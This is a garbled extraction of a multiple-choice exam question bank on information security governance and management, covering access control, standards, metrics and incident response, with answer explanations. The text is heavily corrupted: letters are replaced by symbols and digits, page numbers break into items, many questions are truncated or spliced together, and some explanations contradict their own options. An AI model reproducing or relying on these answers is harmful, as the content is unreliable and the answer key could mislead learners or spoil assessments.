1@ 1@What would be the purpose of an enterprise*s Board setting directionfor information security$ driving policy and information securitystrategy?

A. "eveloping a mission statement.B. "efining an enterprise ris! profile.C. Allocating accountability.". (electing specific security solutions.

0he Board would be setting out the enterprises appetite for ris! their ris! profile%&

11 11Gormal standards + procedures should be driven by businessre3uirements and focused on issues thatH

A. Cause the enterprise the most harm.B. Cause the least concern.C. Cause customers the most satisfaction.". Cause the least vulnerability.

Gormal standards + procedures should be driven by business re3uirements$based on practical experience and focused on issues that cause the most harm%1

1& 1&Which one of the following statements about the information securityarchitecture is least li!ely to be correct?

A. 't provides a framewor! to produce high level policy statements andstrategies$ detailed specifications$ guidelines$ standards and obdescriptions.B. 't describes to the form$ appearance$ function and location ofinformation security processes.C. 't provides a common basis for the design$ development$

implementation and management of the information security process.". 't provides the basis on which the enterprise technology architecturewill be selected and implemented.

" is the correct answer. (ecurity architecture does not normally determine thetechnology architecture. (ecurity is derived from technology. A$ B and C are alltrue statements about security architecture %

1- 1-0he security administration effort will be greatly reduced through thedeployment of which one of the following techni3ues?

A. "iscretionary access control.

B. Access control listsC. %ole based access control". 7andatory access control.

%ole based access control is correct because it separates individuals from rolesand ties access to specific roles. 0his reduces the security administration effortwhen individuals change positions within the enterprise. A$ B and " are normallyassociated with the identity of individuals$ creating a much more challengingadministration environment %-

1 1Gormal standards + procedures should be driven by businessre3uirements$ but based onH

A. ser re3uests.B. 'ndustry expert advice.C. 7anagement opinion.". Practical experience.

Gormal standards + procedures should be driven by business re3uirements$based on practical experience and focused on issues that cause the most harm%

12 12Which one of the following is an example of an information securitygovernance best practice?

A. 7anagement has addressed the interconnectivity of systems.B. 7inimal involvement of the Board in ris! management processes.C. 0he Board has established ownership for security and continuitywith enterprise managers.". '0 security issues are !ept separate from business issues.

B and C are potential governance issues$ but B is incorrect ma!ing C the onlycorrect answer %-

15 15

Which one of the following is an example of an information securitygovernance best practice?

A. 7anagement has standardised on one anti virus solution.B. 7anagement maintains a record of security personnel overtimecharges.C. 7anagement receives regular reports on the number of securityincidents occurring.". 7anagement has a view on how much the enterprise should investin '0 security improvements.


16/33

19 19Which one of the following items would be a !ey deliverable from thepro ect planning phase of the security implementation plan?

A. "etailed description of business processes and data model.B. 'nitial security rating for availability$ confidentiality and integrityre3uirements.C. "escription of the system specific controls to be developed.". "efinition of tests to be carried out on all controls.

"uring the pro ect planning phase it is most li!ely that only provisional

information is available li!e initial security ratings. "uring later phases businessprocess modeling$ systems specific controls identified and testing would beperformed %&

1; 1;Why is it important that the awareness of security baselines isintegrated in the design and management of security for businessapplications and the infrastructure?

A. 't removes the need to document security re3uirements.B. 'ncorporating security post implementation is difficult.C. elps with the development of better security assessmentprograms.

". 't removes the re3uirement for a ris! assessment.Changes to applications have traditionally been difficult to implement afterimplementation and are costly %&

&@ &@Which one of the following is an example of a preventativemanagement security control?

A. 'ncident response capability.B. Periodic system audits.C. (ystem security plans.". Personnel clearance chec!s.

A plan of action is a preventative control whilst the other options are detective %-

&1 &1When is the prototyping approach to developing a security solutionmost appropriate?

A. When the solution is obtained from a reputable vendor.B. When the solution is technically complex.C. When the solution is developed by inexperienced staff.". When the solution*s functional specification is not clear.

A is incorrect since the functionality is already fixed. B is incorrect as prototypingwould be an inefficient way to solve technically complex issues. C isinappropriate$ as inexperienced staff will battle with the loose development styleassociated with prototyping. " is correct because prototyping specificallyaddresses a step by step development process$ chec!ing the user re3uirementall the way %

&& &&Which one of the following provides the best mapping of accessprivileges to an enterprise*s organi/ational structure?

A. :roup based access control.B. "iscretionary access control.C. 7andatory access control.". %ole based access control.

%oles are associated with specific positions in an organi/ation. 0hey are notmapped directly to individuals. 7andatory access control is applied to resourceswhilst discretionary and group based privilege are associated with individuals orgroups of individuals %

&- &-Girewalls are used to protect an entity*s internal resources and wouldtypically include which one of the following features?

A. (tateful pac!et analysis.B. ser authentication.C. "ial up security.". 8irus controls.

A firewall filters the pac!ets in the process of deciding to let it pass through or bere ected %1

& &Which of the following can best describe the three pillars of 'nformation(ecurity?

A. (trategy$ 0actical$ and


17/33

interception.C. A digital digest can correspond to only one specific message.". A digital digest can be calculated 3uic!er than a chec!sum.

A digital digest is created by establishing a uni3ue hash total for a particularstring of characters. Conse3uently a digital digest correspond to only one specificmessage C. 0he other options are all incorrect statements about digital digests%-

&9 &9

What would 7$whilst the rest are measures for information security %&

-5 -5Which one of the following would be a good performance measure of'nformation (ecurity succeeding?

A. Gull compliance$ or agreed and recorded deviations from minimumsecurity re3uirements.


18/33

B. Percent of '0 security plans and policies communicated to allsta!eholders.C. 'mmediate reporting on critical incidents.". #umber of critical infrastructure components with automaticavailability monitoring.

" relates to (ecurity 7anagement =an enabler+EP' of security management>$whilst the rest are measures for information security governance =E:'s> %

-6 -6What would be the main ob ective of enforcing a clear des! policy?

A. %educing ris! of a fire ha/ard.B. Avoiding unauthori/ed access.C. Proper documentation control.". (ecurity wor!flow procedure.

A is partly true$ but not the main ob ective. B is correct as it reduces the ris! ofunauthori/ed access to information. C and " are inappropriate answers %&

-9 -9Which one of the following would be a good performance measure of'nformation (ecurity succeeding?

A. Alignment of access rights with organi/ational responsibilities.B. #umber of incidents involving unauthorised access.C. #o security incidents causing public embarrassment.". #umber of new implementations delayed by security concerns.

C relates to (ecurity 7anagement =an enabler+EP' of security management>$whilst the rest are measures for information security governance =E:'s> %-

-; -;) mail systems have proved to be a useful source of evidence$particularly at times of litigation. What is the primary reason for this?

A. (trong access controls establish accountability for activity on the email system.B. "ata classification is often used to regulate what information shouldbe communicated via e mail.C. Clear policy for using e mail within the enterprise ensures that theright evidence is available.". Poor house!eeping leads to excessive cycles of bac!up filesremaining available.

) mail is generally poorly controlled$ and because of instability$ numerous copiesof files are often stored for long periods of time %

@ @'n which system development life cycle stage would the detailed

specification for security be prepared?

A. Construction.B. (olution "efinition.C. %e3uirements analysis.". 'mplementation.

(pecifications are developed as part of the development of a definition for anappropriate solution %&

1 1What is a !ey activity necessary prior to the definition of controls?

A. Analy/e residual ris!.B. Analysis of threats and vulnerabilities.C. "efinition of tests.". Duality control.

Controls are countermeasures to reduce ris!. 0herefore the analysis of threatsand vulnerabilities is re3uired %&

& &0he assessment of ris! is 7


19/33

A. Critical success factors.B. Eey performance indicators.C. Eey goal indicators.". 7ar!et trends.

Eey performance indicators are *lead* indicators about the enablers forinformation security to satisfy !ey goals and ultimately business ob ectives %&

6 6When using external resources the security manager must personallymaintain which one of the following?

A. 'ncident management response.B. Chain of command.C. "evelopment of procedures.". %egular appraisal of contract staff.

When utili/ing external resources$ the responsibility still resides with theinformation security manager. 0herefore the security manager must have aincident management capability %1

9 9Which one of the following activities is part of configuration

management?

A. Procurement.B. 7anage contracts.C. Change management.". 7anage retirement.

Change management is part of the configuration lifecycle$ whilst the otheroptions are part of asset management lifecycle %-

; ;0he evaluation of a security service or product against the CommonCriteria will have as its primary ob ective the performance of which oneof the following?

A. )ngineering due diligence.B. Cryptography review.C. Process controls.". Product interoperability.

0he Common Criteria focuses on establishing the reliability of the engineeringprocesses with a view to ensure that this can not have compromised the finalproduct %1

2@ 2@0he review of a cryptographic module is most li!ely to be inaccordance with which one of the following?

A. Common Criteria.B. G'P( 1 @ specification.C. '(< ;@@@.". '(< 166;;.

G'P( 1 @ is a cryptography specification$ the Common Criteria is an engineeringspecification$ '(< ;@@@ is a 3uality management standard and '(< 166;; is asecurity management standard %&

21 21What would be a primary driver for an enterprise to certify and accreditcompliance of business applications and infrastructure to the

enterprise*s information security governance framewor!?

A. :lobali/ation standards.B. 'nsurance contracts.C. 7anagement commitment.". 'nternal audit re3uirements.

Gor an enterprise to cer tify and accredit compliance of business applications andinfrastructure to the enterprise*s information security governance framewor!re3uires a great deal of management commitment %-

2& 2&Which one of the following is a considerable advantage of optical fibre?

A. Cheap.B. )asy to install.C. %eadily available.". (uitable for long distances.

" is the only advantage$ the other options are usually disadvantages %

2- 2- As *virtual networ!s* proliferate$ users need access to many bac! end

databases. Which one of the following is li!ely to be the mostburdensome tas! to overcome?

A. Centrally managing users and roles.B. 'mplementing levels of user authentication.C. "efining users for each database.". (ecuring sensitive data from the database administrators.

0he most time consuming tas! is setting up users and their privileges on thevarious databases %-

2 2Which one of the following is the most significant benefit of an antipiracy policy to an organi/ation?

A. 't prevents staff from using illegal software on the entity*scomputers.B. 't focuses management attention on matters for discipline in theentity.C. 't reduces the li!elihood of successful litigation against the entity.". 't ensures staff are able to distinguish between legal and illegalsoftware.

Whilst a policy has the ob ective of communicating management*s attention$should litigation occur a clear policy on anti piracy 3uic!ly reduces the li!elihoodof success %-

22 22Which one of the following approaches is most li!ely to be peopleresource intensive?

A. %ole based access control.B. 0o!en based control lists.C. "iscretionary based access control.". :roup based access control.

"iscretionary based access control re3uires every individual with accessprivileges to be listed on the access control list of each protected resource. )achof the other approaches has a greater degree of consolidation than the individuallevel %-


20/33

25 25ow would a security manager prioriti/e the amount of physical$

administrative and technical controls to employ?

A. 'nternal audit expectation.B. %is! assessment.C. 0echnical architecture.". 8endor recommendation.


21/33

2 2Business !nowledge is essential for the information security as it isnecessary to conduct which of the following?

A. Cost benefit analysis.B. Countermeasure design.C. "escribe core functionality.". )stimate pro ect costs.

'nterpreting information security policies into operational use re3uires the securitymanager to perform a cost benefit analysis %1

5 5 An information security manager would issue a security guideline withwhich one of the following ob ectives in mind?

A. A specific information security program in mind.B. Provide a statement for overall design and operation of security.C. "irections for preferred levels of security and programs.". Eeep the number of alternative solutions to a minimum.

A guideline is used to communicate the preferred levels of security and to offerguidance regarding security programs %-

6 6ow does top level management best demonstrate their commitment

to the information security efforts?

A. Appointing a security officer.B. Participating in discussions.C. (igning statements of support.". Providing sufficient resources.

Providing resources is the clearest and strongest statement of all %

9 9

ow can an enterprise achieve a consistent standard of good practicefor information security across the enterprise?

A. 0hrough security awareness campaigns.B. 0hrough detailed security guidelines.C. 0hrough clear direction from top management.". 0hrough the use of a mission statement.

0op management direction will ensure that information security receivesappropriate attention.


22/33

A. Availability of choices.B. (upport for users.C. 0echnical ability.". %eporting of activity.

%esponsiveness is matched by a need for flexibility %1

15 15ow could the information security manager B)(0 minimi/e the ris! of

proprietary coding standards being shared with competitors*programmers?

A. Programming standards.B. #on disclosure agreements.C. Code of practice for staff.". %egular development pro ect audits.


23/33

%1

&2 &2 A central characteristic in preparing a information security function*smission statement is which one of the following?

A. )thics.B. Priority.C. 8ision.

". 8alues.7ission statements that are laundry lists of every responsibility possible areusually greeted with the disdain they deserve. 7ission statements set targets anddistinguish between what is important and what is not %&

&5 &5 A standard$ in addition to describing a process or ob ect$ is primarilyused for which one of the following purposes?

A. 7easurement of compliance.B. :uidance about choices.C. "escriptive regarding * ow to*.". (tep by step in detail.

A standard describes a process in a manner such that compliance with thespecification can be measured and the expected benefits from the processdetermined %1

&6 &60o manage the success of the investments in information security$ theinformation security manager must ensure that there is alignment withbusiness expectations through the use of which one of the followingtools or techni3ues?

A. :ap analysis.B. Cost benefit analysis.C. Eey performance indicators.". Pro ect management.

Eey performance indicators are used to manage and monitor process to ensurebusiness ob ectives are met %-

&9 &90he security manager can use the Cobi0 maturity model as a basis forwhich of the following?

A. Alignment with goals.B. Continuous improvement.C. Cost benefit analysis.". (ensitivity analysis.

7aturity modelling is associated with building increasingly sophisticatedcapability %&

&; &;0he philosophy of control in open systems should always be toimprove on current levels of performance. 0ools to accomplish thisincludeH

A. P)%0 methods.B. Benchmar! metrics.C. 7aturity models.". Duality measurements.

0he principle behind a maturity model is to define stages of maturity and then tomeasure the entity against these stages of maturity %-

-@ -@Why is a hardware based firewall generally considered better than asoftware based approach?

A. 7ore secure.B. Better performance.C. 7ore reliable.". Better documentation.

Better performance can be obtained from hardware based solutions %&

-1 -1Which one of the following is an example of a vulnerabilityassessment?

A. (cenario planning.B. Penetration testing.C. 'ntruder detection.". 0hreat analysis.

Penetration testing is an example of a vulnerability test %&

-& -& A password crac!er is a tool best suited to assessing which one of thefollowing?

A. Business impact.B. (ensitivity.C. 8ulnerability.". %is!s.

A password crac!er is used to establish the vulnerability of passwords to beingexploited %-

-- --Why is it important that the security implication of a change bemanaged early in the process?

A. All changes to controls must be traceable.B. 0rivial changes should not re3uire authori/ation.C. )mergency changes should not re3uire documentation.". #ot all changes need ustification.

All changes to controls must be traceable and underta!en in a controlled manner%1

- -What techni3ue is used to ensure that appropriate changes are madeto all deliverables throughout the life cycle?

A. Program library.B. 8ersion control.C. 0ape Fibrary.". Control totals.

8ersion control is the way to establish control over deliverables %&


24/33

-2 -2Which one of the following is the 7


25/33

2 2ow can the information security manager chec! that security

administrators are performing their tas!s responsibly?

A. %eview access permission change re3uest procedures.B. )xamine a log of all user activity.C. 'nspect a log of failed access attempts.". Customer satisfaction surveys.

'nspecting the log of user activity will highlight the number of wea!nesses in thesystem as a result of unauthorised user activity %&

5 50he security manager is expected to fulfill which one following roleswhen wor!ing with internal and external assurance providers?

A. :uide.B. 7anager.C. Fiaison.". Assistant.

0he assurance process is a !ey process within the information security programand the information security program can benefit from the periodic reviews.Conse3uently$ the security manager should act as a liaison point %-

6 6Which one of the following is a universal standard to evaluate thesecurity and assurance levels of technology products?

A. '(< 166;;.B. Common Criteria.C. Cobi0". (A( 6@0he Common Criteria is a result of the harmonisation of the ( and)uropean standards for security evaluation and accreditation. '(< 166;; is code of practice for information security$ Cobi0 is an '0process control model, (A( 6@ defines the scope of an audit %&

9 98ulnerability scanner reports often serve as a wa!eup call formanagement$ but are not very useful in providing assurance in whichone of the following instances?

A.


26/33

reporting service is typically an early warning mechanism enabling securitymanagers to respond instantly to new vulnerabilities %&

22 22Enowledge of civil unrest or protest near the enterprise*s facility wouldre3uire which one of the following actions?

A. Permanent increase in physical security.B. 0emporary increase in baseline for physical security.C. 'mprovement in logical access control.". #o action is re3uired as the event is external to the enterprise.

Baseline security should be increased to match the threat and removed if nolonger necessary %&

25 25Which one of the following will be the most important part of problemmanagement practices for security?

A. Being systematic.B. 0rac!ing results.C. "efine the problem.". 7aintaining protection.

0he security manager will re3uire that the necessary levels of protection existthroughout the process of handling a problem issue %

26 26Which one of the follow should be standard practice for problemmanagement after the emergency fixes have been made?

A. )mergency fixes should be properly documented.B. (enior management should approve the emergency fixes.C. Authorisation for emergency access should be revo!ed.". )mergency fixes should be tested in the test environment.

)mergency fixes should be reversed$ ma!ing options A$ B and " inappropriate.

Authorisation for emergency access should be revo!ed immediately %-

29 29Which one of the following is a useful metric to measure problemmanagement?

A. #umber of information security problems in the month.B. Awards received for dedication to the tas!.C. Average time and manpower needed to resolve a problem.". #umber of items in the auditors report related to problemmanagement.

0he most useful metric is the average time and manpower needed to resolve a

problem. 0he number of problems arising has less to do with problemmanagement itself. (imilarly$ dedication to the ob is great$ but vague. 0heauditors report is not a scorecard but an opinion on items for improvement %-

2; 2;ow can the fre3uently held view amongst staff that information

security policies result in excessive administrative burden$ best beovercome?

A. )xecutive support be obtained.B. Administrative guidelines.C. Clear documentation.". Awareness training.

)xecutive support would be the best indicator to staff that security policies are tobe ta!en seriously %1

5@ 5@ An information security manager concerned with the integration andoperation of security solutions across the enterprise would use whichone of the following approaches to influence others?

A. 'nformation security guideline.B. 'nformation security standard.C. 'nformation security policy.". 'nformation security architecture.

An information security architecture is used to communicate at a high level there3uirements for information protection %

1 1%eports received from vulnerability scans often serve as a wa!eup callfor management. #etwor! vulnerability scanners are useful for allexcept one of the following. Which one is the exception?

A.


27/33

first point of the incident response process to test would be which oneof the following?

A. 0eam members* !nowledge of what to do.B. 0he review of system logs.C. 0he 3ualifications of the team members.". sers* !nowledge of who to call.

A critical$ and often overloo!ed$ step in incident response is !nowing who to call.0hereafter$ the other activities may follow %

2 2 A proactive and practical techni3ue for protection against maliciouscode is which one of the following?

A. Prohibit the downloading of program code.B. Gilter downloaded program code for !ey words.C. Girst execute downloaded programs in a *sandbox*.". Permit code to be downloaded only from trusted sources.

A 4 0his may prevent legitimate computing, B 4 0his is not very reliable, C 4 0hisis the only practical solution, " 4 0his may hinder legitimate computing %-

5 5Comprehensive response and recovery strategies are developedbased on which one of the following?

A. Business impact assessment.B. %is! assessment.C. 'nformation security management*s planning.". (enior management*s approval.

Whilst all the options are true$ the basic re3uirement is that response andrecovery strategies must be developed according to senior management*sapproval$ thereby incorporating their authority and commitment to providingade3uate resources %

6 60raining the response and recovery teams is underta!en with whichone of the following ob ectives in mind?

A. Gamiliarity with their responsibilities.B. Avoid unnecessary detail in the documentation.C. )mpower employees to ta!e decisions as necessary.". Gocus on wea!nesses in the technology.

0raining is essential in ensuring that persons selected gain familiarity with theirresponsibilities. All significant detail must be recorded in the BCP document anddecision ma!ing by employees should be pre empted with clearly definedprocesses. 0echnology is not the primary focus$ rather its an end to endunderstanding of the recovery of an entire business process %1

9 9)mergency management activities typically include which one of thefollowing?

A. (afety of personnel.B. 0esting of procedures.C. "ealing with legal issues.". Cleaning of soiled e3uipment.

)mergency management typically revolves around large scale crisismanagement that includes personnel form various external bodies and

government agencies %1

; ;)xperienced professionals generally consider the use of amethodology to have which one of the following characteristics?

A. 0oo slow for situations that are dynamic in nature.B. Provide structure and order for most situations.C. 'nhibiting to experienced security professionals.". nnecessarily expensive for the ma ority of incidents.

Pandemonium can and does often occur very 3uic!ly when security relatedincidents happen. (imultaneous incidents are more often the case. 0herefore amethodology helps prevent the situation getting out of control$ even for seasonedprofessionals. A methodology often includes the use of proven tools that result ingreater efficiency and ultimately a lower cost %&

1@ 1@Which one of the following is a fre3uent reason given for the failure of'ncident %esponse initiatives?

A. 0ime.B. Enowledge.C. Personnel.". Gunding.

%esponding to security incidents is not cheap and under funding is cited to be a

common problem. Enowledge is generally available from various sourcesincluding the 'nternet. With !nowledge personnel can be trained. 0ime is afunction of availability of !nowledgeable people %

11 11 A petroleum company whose greatest assets are its data regardingwhere crude oil deposits are located$ has its data stored on databaseson its subnets located around the world. Assume countermeasures tothe !nown vulnerabilities are in place$ except that in reality patchingsystems is a slow and dis ointed process and several vulnerabilitiesare being exploited. Which one of the following is li!ely to be the firstincident response step?

A. Perform penetration tests and determine the steps necessary topenetrate these systems.B. %eview the latest ris! assessment and establish whether currentcountermeasures are ade3uate.C. nderstand as much as possible about the systems in use$including how they could be compromised.". Perform a vulnerability assessment for the assets in 3uestion.

Common practice is to start with gaining a proper understanding of the systemsand then determining how incidents that could occur can be dealt with.'rrespective of the extent of any vulnerability$ a determined hac!er will breach thesecurity. %is! assessments date 3uic!ly and therefore countermeasures can3uic!ly become obsolete and conse3uently breached. Penetration tests provideevidence of the wea!nesses that exist and are most useful to prove thevulnerability that has been identified. Both of which highlight the existence of


28/33

wea!nesses and therefore useful$ but not the first step %-

1& 1&Why is the development of a computer emergency response team isfavored?

A. 't lowers the budget.B. )nables better coordination.C. Grees users from this responsibility.

". (olves staffing issues.0ypically$ it re3uires a good+big budget. 't does result in better coordination asdedicated persons can build relationships as appropriate. 't does not free upusers from their responsibilities$ rather it helps users. (taffing issues can only besolved if the correct staff can be employed. 0his often not the case %&

1- 1-sing a methodology to respond to a security related incident is almost

an absolute re3uirement for legal considerations. 0he most obviousbeing which one of the following?

A. Adherence to statutory audit re3uirements.B. "emonstrating due care.

C. "ata protection law.". Wor!ing with law enforcement agencies.

Adopting a reasonable and responsible set of measures to guard against harmwill constitute due care and avoid a possible lawsuit for incompetence in dealingwith an incident %&

1 1With which one of the following organi/ational units is an 'ncident%esponse function most li!ely to encounter resistance from?

A. 'nternal Audit.B.


29/33

&1 &1:ood practice in testing a business continuity plan is considered to bewhich one of the following?

A. (tart small and gradually increase complexity.B. Avoid processes that could have a significant negative impact.C. #ever introduce unplanned events to the test script.".


30/33


31/33

deleted files. 0his is the most effective approach for forensic purposes %1

1 1What is the primary purpose of a post incident follow up review?

A. "etermine if management has ta!en appropriate corrective action.B. Complete items that could not be finales during the review.C. %eview the performance of the review team.

". "etermine if the assessment program is ade3uate for that particularreview.

A typical ob ective of the post incident meeting is to find out if management hasalready ta!en corrective action %1

& &0he post incident review and follow up procedures of the incidentresponse team is essential for which one of the following reasons?

A. Eeep the team*s resources fully occupied.B. Build team spirit.C. Attribute blame for team member mista!es.". se the lessons learned to improve s!ills.

Gollow up provides an opportunity to use the lessons learned to improve s!ills ofthe entire team$ and specifically for new team members. 'ts not about blamingindividuals$ but rather improving the methodology. 0eam building may be asecondary ob ective. 't should not be about simply deploying team members ustto !eep up the appearance of being fully occupied %

++ D )(0'$ and they can trust your oppositionthey might move to them. (imilarly$ if security is very important to yourcustomers$ your entity can attract customers through offers of higher levels oftrust %

6 60he enterprise value proposition for information security is bestestablished through which one of the following?

A. '0 alignment with business goals.B. Eey performance indicators.C. istorical loss records.". Annual loss expectancy calculation.

0he method for establishing the enterprise value of information security is to align

'0 with business goals. 0his is done through cascading the !ey goal indicators ofbusiness down to '0 and then$ down to information security management. Eeyperformance indicators measure short term =daily or monthly> activities andwould not give an indication of the enterprise value. istorical records may not bean accurate reflection. 0he annual loss expectancy may provide some insight$but is focused on the monetary loss %1

9 9Where it is difficult to determine fully the tangible benefits from aninvestment$ as is the case for information security$ the investmentdecision is influenced mostly by which one of the following?

A. Penetration test results.B. Benchmar!ing.

C. Availability of cash.". 7anagement policy.

7anagement policy provides direction for the implementation of security$particularly when tangible benefits are not clear and the decision is closely lin!edto management*s ris! appetite. 0he other options are inappropriate %

; ;Biometric devices can be considered to be which one of the following?

A. (omething you !now.B. (omething you have.C. (omething you are.


32/33


33/33

Awareness should start when the employee oins the enterprise %

5@ 5@:ood advice for developing an enterprise wide security awarenesscampaign is which one of the following?

A. %esist the influence of culture.B. Eeep it simple

C. Concentrate on a single medium.". 7a!e use of threats to get results.

Eeeping things simple is good advice. 't is also good to be aware of theenterprise*s culture and the need for multiple mediums to get the messageacross. se of threats is negative motivation and rarely is successful %&

Documents

simlado cobit 5